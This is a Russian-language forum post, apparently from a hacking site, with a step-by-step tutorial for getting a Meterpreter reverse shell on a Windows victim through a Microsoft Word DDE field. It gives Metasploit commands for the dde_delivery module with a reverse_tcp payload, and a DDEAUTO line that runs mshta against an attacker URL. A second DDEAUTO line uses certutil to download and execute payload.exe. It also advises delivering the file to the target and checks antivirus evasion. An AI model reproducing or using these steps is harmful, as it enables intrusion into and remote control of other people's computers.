Meterpreter сессия через Microsoft Word

Meterpreter сессия через Microsoft Word

WIRIDEX

wihack

Добрый день.

В двух словах покажу как получить сессию meterpreter используя встроенную функцию Microsoft Office DDE

Почерпнуть немного информации о том что это можно тут:

https://xakep.ru/2017/10/13/microsoft-office-dde/

Информация предоставлена для ознакомления, используйте на свой страх и риск.

Нам понадобится Kali linux и какая-нибудь винда (любая от XP до windows 10) с установленным на нём пакетом microsoft office.

Приступим:

Качаем пакет и копируем его в каталог metasploit
Код:

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
cp dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/


Запускаем metasploit и на всякий обновляем модули

msf > reload_all

msf > use exploit/windows/dde_delivery

Подгружаем полезную нагрузку

msf exploit(dde_delivery) > set payload windows/meterpreter/reverse_tcp

msf exploit(dde_delivery) > set lhost 192.168.6.30 (тут ваш IP)

msf exploit(dde_delivery) > exploit

Вывод будет следующим:

И нам нужны последние строки, которые мы и вставляем в ворд

У меня это

Код:

DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe "http://192.168.6.30:8080/dOwU9wGE10np3"


Дальнейшие действия понятны: доставляем этот файл на атакуемый компьютер и запускаем

При открытии будут выскакивать различного рода предупреждения, но ничего связанного с безопасностью там не сказано, но некоторые антивирусы уже будут ругаться на файл.


После открытия файла прилетит заветная сессия meterpreter

Многие антивирусы уже реагируют на файл. Проверка на nodistribute.com

https://NoDistribute.com/result/image/rkvTgVliH2mEFy4JLhANd1.png

Альтернативный код для загрузки файлов, можно использовать не только meterpreter, но и любой продукт для пост-эксплуатации. Empire например

DDEAUTO c:\\Windows\\system32\\cmd.exe "/k certutil -urlcache -split -f http://192.168.0.50/payload.exe && payload"


Спасибо за внимание)

Источник